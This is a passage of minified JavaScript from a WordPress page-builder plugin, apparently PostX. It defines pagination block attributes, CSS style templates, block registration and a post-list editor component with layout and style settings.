Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"dimension",key:"pagiMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"navMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"pagiPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],b=e=>[...g(e).map((e=>e.data)),...y.map((e=>e.data))];function v({name:e,attributes:t,setAttributes:l,clientId:n,forceAjax:m}){const v={setAttributes:l,name:e,attributes:t,clientId:n};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(s,null,(0,o.createElement)(p,null,(0,o.createElement)(a.sT,{store:v,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(i.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:v,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:v,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:u,styleKeys:d,oArgs:b(m),exStyle:["pagiTypo","pagiMargin","pagiPadding"]}))),(0,o.createElement)(c,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{store:v,title:"inline",include:g(m)})),(0,o.createElement)(r.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{store:v,title:"inline",include:y})))))}},82304:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},postId:{type:"number",default:-1},previewImg:{type:"string",default:""},paginationType:{type:"string",default:"pagination"},loadMoreText:{type:"string",default:"Load More",style:[{depends:[{key:"paginationType",condition:"==",value:"loadMore"}]}]},paginationText:{type:"string",default:"Previous|Next",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationNav:{type:"string",default:"textArrow",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationAjax:{type:"boolean",default:!0,style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},navPosition:{type:"string",default:"topRight",style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}]}]},pagiAlign:{type:"object",default:{lg:"center"},style:[{selector:"{{ULTP}} .ultp-loadmore,\n                {{ULTP}} .ultp-next-prev-wrap ul,\n                {{ULTP}} .ultp-pagination,\n                {{ULTP}} .ultp-pagination-wrap { text-align:{{pagiAlign}}; }"}]},pagiTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiArrowSize:{type:"object",default:{lg:"14"},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a svg { width:{{pagiArrowSize}}px; }"}]},pagiColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action { color:{{pagiColor}}; }\n                    {{ULTP}} .ultp-next-prev-wrap ul li a svg { color:{{pagiColor}}; }\n                    {{ULTP}} .ultp-pagination svg,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action svg { color:{{pagiColor}}; }"}]},pagiBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"#000000",type:"solid"},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action"}]},pagiShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action"}]},pagiRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action { border-radius:{{pagiRadius}}; }"}]},pagiHoverColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover { color:{{pagiHoverColor}}; }\n                    {{ULTP}} .ultp-pagination li a:hover svg { color:{{pagiHoverColor}}; }\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover svg,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action:hover svg { color:{{pagiHoverColor}}; } @media (min-width: 768px) {\n                    {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover { color:{{pagiHoverColor}};}}"}]},pagiHoverbg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)",replace:1},style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:focus,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover{ {{pagiHoverbg}} }"}]},pagiHoverBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"#000000",type:"solid"},style:[{selector:"{{ULTP}} .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover { border-radius:{{pagiHoverRadius}}; }"}]},pagiPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"14",right:"14",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action { padding:{{pagiPadding}}; }"}]},navMargin:{type:"object",default:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul { margin:{{navMargin}}; }"}]},pagiMargin:{type:"object",default:{lg:{top:"30",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"!=",value:"navigation"}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination,\n                    {{ULTP}} .ultp-loadmore { margin:{{pagiMargin}}; }"}]}}},30365:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(82304),n=l(53991),r=l(74711),s=l(84006);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-pagination/","block_docs");p(n,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/pagination.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Pagination from PostX","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:i.Z,usesContext:["postId","post-grid-parent/postBlockClientId","post-grid-parent/pagi"],ancestor:["ultimate-post/post-grid-parent"],edit:r.Z,save:s.Z})},84006:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(99838);const{useBlockProps:n}=wp.blockEditor,r="ultimate-post/post-pagination";function s({attributes:e}){const{blockId:t,paginationType:l,paginationNav:s,paginationAjax:p,paginationText:c,loadMoreText:u,postId:d}=e,m=n.save({className:`ultp-block-${t} ultp-pagination-block ultp-pagination-wrap`});let g="";return t&&(g=(0,i.Kh)(e,r,t,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(o.Fragment,null,g&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:g}})),(0,o.createElement)("div",m,"loadMore"==l&&(0,a.Bv)(u),"navigation"==l&&(0,a.pI)(),"pagination"==l&&(0,a.fF)(s,p,c)))}},4696:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(53049),i=l(87025);const{getBlockAttributes:n,getBlockRootClientId:r}=wp.data.select("core/block-editor"),{useBlockProps:s,useInnerBlocksProps:p}=wp.blockEditor,{useEffect:c,useMemo:u}=wp.element,{useSelect:d,useDispatch:m}=wp.data;function g({attributes:e,setAttributes:t,clientId:l,context:g,isSelected:y}){const[b,v,h,f]=d((e=>{const t=e("core/block-editor").getBlocks(l),o=(0,i.FL)(t),a=o.filter((e=>(0,i.M5)(e.name))).map((e=>({blockId:e.attributes.blockId,name:e.name.replace("/","_")}))),n=o.filter((e=>e.name.includes("ultimate-post/post-pagination"))).map((e=>"ultp-block-"+e.attributes.blockId)),r=o.filter((e=>e.name.includes("advanced-filter"))).map((e=>"ultp-block-"+e.attributes.blockId)),s=!(a.length>0)||["ultimate-post/advanced-filter","ultimate-post/post-pagination",...a.map((e=>e.name.replace("_","/")))];return[JSON.stringify(a),JSON.stringify(n),JSON.stringify(r),s]}),[l]);c((()=>{if(y)try{document.querySelector(".block-list-appender").style.display="none"}catch{}}),[y]);const k=p(s({className:"ultp-post-grid-parent"}),{allowedBlocks:f});return c((()=>{const{currentPostId:o}=e,i=n(r(l));(0,a.qi)(t,i,o,l),t({cId:l,grids:b,pagi:v,postId:g.postId?String(g.postId):"",currentPostId:g.postId?String(g.postId):""})}),[l,b,v,g.postId]),function(e){var t;const{updateBlockAttributes:l}=m("core/block-editor"),o=d((t=>t("core/block-editor").getBlocks(e)),[]),a=u((()=>(0,i.FL)(o)),[o]),n=u((()=>a.filter((e=>"ultimate-post/filter-select"===e.name&&["category","tags","custom_tax","author"].includes(e.attributes.type)))),[a]),r=u((()=>a.filter((e=>(0,i.M5)(e.name)))),[a]);c((()=>{const e={};n.forEach((t=>{const{dropdownOptionsType:l,dropdownOptions:o,type:a,filterStyle:i}=t.attributes,n=JSON.parse(o)[0];"dropdown"===i&&"specific"===l&&n&&(e[t.clientId]=`${a}###${n}`)})),r.forEach((t=>{const{attributes:{defQueryTax:o}}=t;if(Object.keys(e).length>0){let a=!1;for(const t of Object.keys(e))if(!(t in o)||o[t]!==e[t]){a=!0;break}a&&l(t.clientId,{defQueryTax:e})}else 0!==Object.keys(o).length&&l(t.clientId,{defQueryTax:{}})}))}),[n,r]);const s=u((()=>a.find((e=>"ultimate-post/advanced-filter"===e.name))),[a]),{relation:p}=null!==(t=s?.attributes)&&void 0!==t?t:{};c((()=>{p&&r.forEach((e=>{e.attributes.advRelation!==p&&l(e.clientId,{advRelation:p})}))}),[r,p])}(l),(0,o.createElement)("div",k)}},55261:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{useBlockProps:i,useInnerBlocksProps:n}=wp.blockEditor;function r({attributes:e}){const t=n.save(i.save({className:"ultp-post-grid-parent"}));return(0,a.createElement)("div",(0,o.Z)({},t,{"data-postid":e.currentPostId,"data-grids":e.grids,"data-pagi":e.pagi}))}},97575:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},cId:{type:"string",default:""},postId:{type:"string",default:""},currentPostId:{type:"string",default:""},previewImg:{type:"string",default:""},advFilterEnable:{type:"boolean",default:!1},grids:{type:"string",default:""},pagi:{type:"string",default:""}}},82177:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(4696),r=l(55261),s=l(97575),p=l(26887);const{__}=wp.i18n,{registerBlockType:c}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-1/","block_docs"),c(p,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/post-block.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Block from PostX","ultimate-post")),providesContext:{"post-grid-parent/postBlockClientId":"cId","post-grid-parent/pagi":"pagi"},usesContext:["postId"],attributes:s.Z,transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-parent"),...(0,i.Z)("ultimate-post/post-grid-parent","listBlocks")]},edit:n.Z,save:r.Z})},64173:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(32616);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=S(null),{setAttributes:l,name:M,clientId:A,isSelected:H,className:N,attributes:j,context:Z,attributes:{blockId:O,currentPostId:R,readMoreIcon:D,imgCrop:z,excerptLimit:F,metaStyle:W,metaShow:V,catShow:G,showImage:q,metaSeparator:$,titleShow:K,catStyle:J,catPosition:Y,titlePosition:X,excerptShow:Q,showFullExcerpt:ee,imgAnimation:te,imgOverlayType:le,imgOverlay:oe,metaList:ae,readMore:ie,readMoreText:ne,metaPosition:re,columns:se,customCatColor:pe,onlyCatColor:ce,contentTag:ue,titleTag:de,showSeoMeta:me,titleLength:ge,metaMinText:ye,metaAuthorPrefix:be,titleStyle:ve,layout:he,gridStyle:fe,metaDateFormat:ke,authorLink:we,fallbackEnable:xe,imgCropSmall:Te,vidIconEnable:_e,notFoundMessage:Ce,excerptLimitLg:Ee,fullExcerptLg:Se,dcEnabled:Pe,dcFields:Le,previewImg:Ie,advanceId:Be,paginationShow:Ue,paginationAjax:Me,headingShow:Ae,filterShow:He,paginationType:Ne,navPosition:je,paginationNav:Ze,loadMoreText:Oe,paginationText:Re,V4_1_0_CompCheck:{runComp:De}}}=e,[ze,Fe]=E(w.Ti),[We,Ve]=E(null);function Ge(e){Fe({...ze,selectedDC:e})}function qe(){Fe({...ze,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function $e(e){Fe({...ze,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),Ve("setting")}function Ke(e){Fe((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function Je(){ze.error&&Fe({...ze,error:!1}),ze.loading||Fe({...ze,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(j)}).then((e=>{Fe({...ze,postsList:e,loading:!1})})).catch((e=>{Fe({...ze,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),Je()}),[]),C((()=>{const t=A.substr(0,6),o=B(U(A));(0,a.qi)(l,o,R,A),(0,v.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[A]),C((()=>{const e=t.current;(0,h.o6)()&&0===j.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,j)&&(Je(),t.current=j),e.isSelected!==H&&H&&(0,w.gT)($e,Ke)):t.current=j}),[j]);const Ye={settingTab:We,setSettingTab:Ve,setAttributes:l,name:M,attributes:j,setSection:$e,section:ze.section,clientId:A,context:Z,setSelectedDc:Ge,selectedDC:ze.selectedDC,selectParentMetaGroup:function(e){Ge(e),Ke("dc_group")}};let Xe;if(O&&(Xe=(0,y.Kh)(j,"ultimate-post/post-list-1",O,(0,a.k0)())),Ie&&!H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Ie});C((()=>{H&&Ie&&l({previewImg:""})}),[e?.isSelected]);const Qe=_({...Be&&{id:Be},className:`ultp-block-${O} ${N}`,onClick:e=>{e.stopPropagation(),$e("general"),Ke("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:Ye,selected:ze.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:Ye})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",include:[{position:1,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}}],exclude:["spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout+adv_style",layoutData:{type:"layout",block:"post-list-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pl1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pl1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pl1/l4.png",label:"Layout 4",value:"layout4",pro:!0}]},advStyleData:{type:"layout",key:"gridStyle",pro:!0,tab:!0,label:__("Advanced Style","ultimate-post"),block:"post-list-1",options:[{img:"assets/img/layouts/pl1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pl1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pl1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[De?"exclude":"dep"]:a.N2}],store:Ye}),(0,o.createElement)("div",Qe,Xe&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Xe}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ae||He||Ue)&&(0,o.createElement)(r.m,{attributes:j,setAttributes:l,onClick:()=>{$e("heading"),Ke("heading")},setSection:$e,setToolbarSettings:Ke}),function(){const e=`${ue}`,t=(e,t)=>(0,h.o6)()&&Pe&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Le,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ke(t)},selectedDC:ze.selectedDC,setSelectedDc:Ge,setAttributes:l,dcFields:Le});return ze.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):ze.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):ze.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-pl1a-${fe} ultp-block-column-${se.lg} ultp-post-list1-${he}`},ze.postsList.map(((a,r)=>{const p=JSON.parse(ae.replaceAll("u0022",'"')),u="style1"!=fe?0==r?z:Te:z,d=(a.image&&!a.is_fallback||xe)&&q?(0,o.createElement)(s.ZP,{catPosition:Y,imgOverlay:oe,imgOverlayType:le,imgAnimation:te,post:a,imgSize:u,fallbackEnable:xe,vidIconEnable:_e,idx:r,Category:"aboveTitle"!=Y?(0,o.createElement)(i.Z,{post:a,catShow:G,catStyle:J,catPosition:Y,customCatColor:pe,onlyCatColor:ce,onClick:()=>{$e("taxonomy-/-category"),Ke("cat")}}):null,onClick:()=>{$e("image"),Ke("image")},vidOnClick:()=>{$e("video"),Ke("video")}}):null;return(0,o.createElement)(e,{key:r,className:`ultp-block-item post-id-${a.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},(0,o.createElement)("div",{className:"ultp-block-entry-content"},t(9,a.ID),"style3"==fe&&0==r&&d,(0,o.createElement)("div",{className:"ultp-block-entry-heading"},t(8,a.ID),"aboveTitle"==Y&&(0,o.createElement)(i.Z,{post:a,catShow:G,catStyle:J,catPosition:Y,customCatColor:pe,onlyCatColor:ce,onClick:()=>{$e("taxonomy-/-category"),Ke("cat")}}),t(7,a.ID),a.title&&K&&1==X&&(0,o.createElement)(g.Z,{title:a.title,headingTag:de,titleLength:ge,titleStyle:ve,onClick:e=>{$e("title"),Ke("title")}}),t(6,a.ID),V&&"top"==re&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:$,metaStyle:W,metaMinText:ye,metaAuthorPrefix:be,metaDateFormat:ke,authorLink:we,onClick:e=>{$e("meta"),Ke("meta")}}),t(5,a.ID),a.title&&K&&0==X&&(0,o.createElement)(g.Z,{title:a.title,headingTag:de,titleLength:ge,titleStyle:ve,onClick:e=>{$e("title"),Ke("title")}}),t(4,a.ID)),("style3"!=fe||"style3"==fe&&0!=r)&&d),(0,o.createElement)("div",{className:"ultp-block-content"},t(3,a.ID),Q&&(0,o.createElement)(n.Z,{excerpt:a.excerpt,excerpt_full:a.excerpt_full,seo_meta:a.seo_meta,excerptLimit:F,showFullExcerpt:ee,showSeoMeta:me,onClick:e=>{$e("excerpt"),Ke("excerpt")}}),t(2,a.ID),ie&&(0,o.createElement)(m.Z,{readMoreText:ne,readMoreIcon:D,titleLabel:a.title,onClick:()=>{$e("read-more"),Ke("read-more")}}),t(1,a.ID),V&&"bottom"==re&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:$,metaStyle:W,metaMinText:ye,metaAuthorPrefix:be,metaDateFormat:ke,authorLink:we,onClick:e=>{$e("meta"),Ke("meta")}}),t(0,a.ID),(0,h.o6)()&&Pe&&(0,o.createElement)(f.Z,{dcFields:Le,setAttributes:l,startOnboarding:qe}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ce})}(),Ue&&"loadMore"==Ne&&(0,o.createElement)(p.Z,{loadMoreText:Oe,onClick:e=>{$e("pagination"),Ke("pagination")}}),Ue&&"navigation"==Ne&&"topRight"!=je&&(0,o.createElement)(u.Z,{onClick:()=>{$e("pagination"),Ke("pagination")}}),Ue&&"pagination"==Ne&&(0,o.createElement)(d.Z,{paginationNav:Ze,paginationAjax:Me,paginationText:Re,onClick:e=>{$e("pagination"),Ke("pagination")}}))))}},32616:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=10,b=e=>{const{store:t}=e,{layout:l,gridStyle:n,queryType:r,advFilterEnable:u,advPaginationEnable:d,V4_1_0_CompCheck:{runComp:y}}=t.attributes,{context:b,section:v,settingTab:h,setSettingTab:f}=t;return g((()=>{(0,m.CH)(b,u,t,d)}),[u,d,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6836",store:t}),(0,o.createElement)(p.Sections,{settingTab:h,setSettingTab:f},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:v.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-list-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pl1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pl1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pl1/l4.png",label:"Layout 4",value:"layout4",pro:!0}],variation:{layout1:{columns:{lg:"2",xs:"2"},headerSpaceX:{lg:"",unit:"px"},headerWrapBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"30",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"16",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate","metaRead"]',metaMargin:{lg:{top:"15",bottom:"15",unit:"px"},xs:{top:"10",bottom:"10",unit:"px"}},excerptLimit:"20"},layout2:{columns:{lg:"2",xs:"1"},headerSpaceX:{lg:"20",unit:"px"},headerWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"0",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"0",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate"]',metaMargin:{lg:{top:"15",bottom:"0",unit:"px"},xs:{top:"15",bottom:"0",unit:"px"}},excerptLimit:"35"},layout3:{columns:{lg:"2",xs:"1"},headerSpaceX:{lg:"",unit:"px"},headerWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"0",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"0",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate"]',metaMargin:{lg:{top:"15",bottom:"0",unit:"px"},xs:{top:"15",bottom:"0",unit:"px"}},excerptLimit:"35"},layout4:{columns:{lg:"2",xs:"1"},headerSpaceX:{lg:"20",unit:"px"},headerWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"0",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"0",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate"]',metaMargin:{lg:{top:"15",bottom:"0",unit:"px"},xs:{top:"15",bottom:"0",unit:"px"}},excerptLimit:"35"}}}},{position:1,data:{type:"layout",key:"gridStyle",pro:!0,tab:!0,label:__("Advanced Style","ultimate-post"),block:"post-list-1",options:[{img:"assets/img/layouts/pl1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pl1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pl1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}},{position:6,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:v.title,include:["style1"!=n&&{position:3,data:{type:"typography",key:"postListTypo",label:__("Large Title Typography","ultimate-post")}}],exclude:["titleBackground"],hrIdx:[4,8]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:v.image,include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback 